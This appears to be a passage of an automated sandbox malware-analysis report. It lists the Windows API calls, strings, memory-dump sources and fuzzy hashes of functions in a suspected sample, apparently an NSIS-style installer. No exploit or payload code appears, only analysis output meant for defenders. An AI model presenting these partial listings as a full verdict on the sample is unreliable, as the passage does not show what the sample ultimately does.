                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                                                                                                                                                    • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                                                                                                                                                    • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                                                                                                                                                    • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                                                                                                                                                    • API String ID: 1697273262-1764544995
                                                                                                                                                                                                                                                                                    • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                                                                                                                                    • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                      • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                                      • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                                                                                                                                                    • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                                                                                                                                                    • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                                                                                                                                                    • API String ID: 2577523808-3778932970
                                                                                                                                                                                                                                                                                    • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                                                                                                                                    • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: lstrcatwsprintf
                                                                                                                                                                                                                                                                                    • String ID: %02x%c$...
                                                                                                                                                                                                                                                                                    • API String ID: 3065427908-1057055748
                                                                                                                                                                                                                                                                                    • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                                                                                                                                    • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetDC.USER32(?), ref: 00402100
                                                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                                                                                                                                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                                                                                                                                                                      • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424179,74DF23A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                    • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                                                                                                                                                                                                                      • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1599320355-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                                                                                                                                                    • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                                    • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                                                                                                                                                                                                                    • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                                                                                                                                                                                                                                    • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                                                                                                                                                                    • String ID: Version
                                                                                                                                                                                                                                                                                    • API String ID: 512980652-315105994
                                                                                                                                                                                                                                                                                    • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                                                                                                                                    • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                                                                                                                                                                    • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2102729457-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                                                                                                                                    • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2883127279-0
                                                                                                                                                                                                                                                                                    • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                                                                                                                    • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                                                                                                                                                                                                                    • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                                                                                                                                                                                                                      • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                                                                                    • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                                                                                                                                    • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                                                                                                                                                                    • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: PrivateProfileStringlstrcmp
                                                                                                                                                                                                                                                                                    • String ID: !N~
                                                                                                                                                                                                                                                                                    • API String ID: 623250636-529124213
                                                                                                                                                                                                                                                                                    • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                                                                                                                                    • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • Error launching installer, xrefs: 00405C74
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                                    • String ID: Error launching installer
                                                                                                                                                                                                                                                                                    • API String ID: 3712363035-66219284
                                                                                                                                                                                                                                                                                    • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                                                                                                                                    • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                    • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                      • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                                                                                                                                                                    • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                                    • API String ID: 3509786178-2769509956
